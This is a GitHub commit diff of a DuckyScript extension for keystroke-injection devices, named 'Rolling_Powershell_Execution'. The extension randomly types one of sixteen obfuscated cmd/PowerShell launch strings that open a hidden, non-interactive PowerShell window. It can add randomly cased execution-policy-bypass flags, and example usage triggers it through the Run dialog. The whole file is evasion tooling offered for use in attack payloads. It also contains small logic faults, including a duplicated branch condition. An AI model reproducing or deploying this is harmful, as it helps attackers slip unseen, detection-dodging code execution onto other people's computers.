Update Rolling_Powershell_Execution

Updated formatting so extension can be properly collapsed
pull/227/head
0iphor13 2023-02-24 12:13:00 +01:00 committed by GitHub
parent 7c809ca7c0
commit 939e63bb11
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 58 additions and 60 deletions

View File

@ -11,70 +11,68 @@ EXTENSION Rolling_Powershell_Execution
DEFINE #EXECUTIONPOLICY FALSE DEFINE #EXECUTIONPOLICY FALSE
DEFINE #DELAY 200 DEFINE #DELAY 200
$_RANDOM_MIN = 1 $_RANDOM_MIN = 1
$_RANDOM_MAX = 16 $_RANDOM_MAX = 16
VAR $RANDOM_PS = $_RANDOM_INT VAR $RANDOM_PS = $_RANDOM_INT
FUNCTION Rolling_Powershell_Execution() FUNCTION Rolling_Powershell_Execution()
IF ($RANDOM_PS == 1) THEN IF ($RANDOM_PS == 1) THEN
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid" STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
ELSE IF ($RANDOM_PS == 2) THEN ELSE IF ($RANDOM_PS == 2) THEN
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi" STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 3) THEN ELSE IF ($RANDOM_PS == 3) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi" STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
ELSE IF ($RANDOM_PS == 4) THEN ELSE IF ($RANDOM_PS == 4) THEN
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H" STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
ELSE IF ($RANDOM_PS == 5) THEN ELSE IF ($RANDOM_PS == 5) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi" STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 6) THEN ELSE IF ($RANDOM_PS == 6) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD" STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
ELSE IF ($RANDOM_PS == 7) THEN ELSE IF ($RANDOM_PS == 7) THEN
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi" STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
ELSE IF ($RANDOM_PS == 8) THEN ELSE IF ($RANDOM_PS == 8) THEN
STRING powershell -NoPro -noninT -win h STRING powershell -NoPro -noninT -win h
ELSE IF ($RANDOM_PS == 9) THEN ELSE IF ($RANDOM_PS == 9) THEN
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD" STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
ELSE IF ($RANDOM_PS == 2) THEN ELSE IF ($RANDOM_PS == 2) THEN
STRING powershell.exe -NoP -nOni -W h STRING powershell.exe -NoP -nOni -W h
ELSE IF ($RANDOM_PS == 10) THEN ELSE IF ($RANDOM_PS == 10) THEN
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H" STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
ELSE IF ($RANDOM_PS == 11) THEN ELSE IF ($RANDOM_PS == 11) THEN
STRING powershell -nopr -noninT -W HiddEn STRING powershell -nopr -noninT -W HiddEn
ELSE IF ($RANDOM_PS == 12) THEN ELSE IF ($RANDOM_PS == 12) THEN
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi" STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
ELSE IF ($RANDOM_PS == 13) THEN ELSE IF ($RANDOM_PS == 13) THEN
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h" STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
ELSE IF ($RANDOM_PS == 14) THEN ELSE IF ($RANDOM_PS == 14) THEN
STRING powershell -noproF -noni -W Hi STRING powershell -noproF -noni -W Hi
ELSE IF ($RANDOM_PS == 15) THEN ELSE IF ($RANDOM_PS == 15) THEN
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi" STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
ELSE ($RANDOM_PS == 16) THEN ELSE ($RANDOM_PS == 16) THEN
STRING powershell.exe -noP -nOnI -windo H STRING powershell.exe -noP -nOnI -windo H
END_IF END_IF
IF_DEFINED #EXECUTIONPOLICY IF_DEFINED #EXECUTIONPOLICY
SPACE SPACE
IF (($RANDOM_PS % 2) == 0) THEN IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS STRING -ep ByPasS
ELSE IF (($RANDOM_PS % 5) == 0) THEN ELSE IF (($RANDOM_PS % 5) == 0) THEN
STRING -exec bypass STRING -exec bypass
ELSE IF (($RANDOM_PS % 7) == 0) THEN ELSE IF (($RANDOM_PS % 7) == 0) THEN
STRING -exeC byPasS STRING -exeC byPasS
ELSE IF (($RANDOM_PS % 10) == 0) THEN ELSE IF (($RANDOM_PS % 10) == 0) THEN
STRING -exEcUtionPoL bYpaSs STRING -exEcUtionPoL bYpaSs
ELSE IF (($RANDOM_PS % 12) == 0) THEN ELSE IF (($RANDOM_PS % 12) == 0) THEN
STRING -exEcUtion bYPaSs STRING -exEcUtion bYPaSs
ELSE ELSE
STRING -eP BYPaSs STRING -eP BYPaSs
END_IF END_IF
END_IF_DEFINED END_IF_DEFINED
ENTER ENTER
DELAY #DELAY DELAY #DELAY
END_FUNCTION END_FUNCTION
REM EXAMPLE USAGE AFTER EXTENSION REM EXAMPLE USAGE AFTER EXTENSION
REM DELAY 2000 REM DELAY 2000
REM GUI r REM GUI r
REM DELAY 2000 REM DELAY 2000
REM Rolling_Powershell_Execution() REM Rolling_Powershell_Execution()
END_EXTENSION END_EXTENSION